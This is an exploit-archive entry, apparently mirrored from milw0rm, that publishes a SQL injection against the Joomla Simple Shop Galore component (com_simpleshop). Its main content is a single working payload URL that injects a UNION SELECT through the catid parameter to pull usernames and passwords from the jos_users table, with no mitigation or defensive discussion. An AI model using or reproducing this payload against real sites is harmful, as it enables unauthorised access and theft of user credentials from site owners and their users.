Joomla Simple Shop Galore Component 3.x (catid) SQL Injection

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Simple Shop Galore Component 3.x (catid) SQL Injection
# Published : 2008-06-16
# Author : eXeCuTeR
# Previous Title : MyMarket 1.72 Blind SQL Injection Exploit
# Next Title : Devalcms 1.4a (currentfile) Local File Inclusion Vulnerability

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
@ Joomla ~ option: com_simpleshop ~ SQL Injection

------------------------------------------------------

@ AUTHOR: eXeCuTeR <executerx[at]gmail[dot]com>

------------------------------------------------------

@ HOME: milw0rm.com

------------------------------------------------------

@ DORK: :

------------------------------------------------------

@ Vuln:
index.php?option=com_simpleshop&task=browse&Itemid=eXeCuTeR&catid=null%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8%20from%20jos_users--
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
					~EOF~

side note:

same vulnerability listed here: http://milw0rm.com/exploits/5743
but this was sent in back in 02/2008, must of missed it.  Original author: eXeCuTeR.

# www.Syue.com [2008-06-16]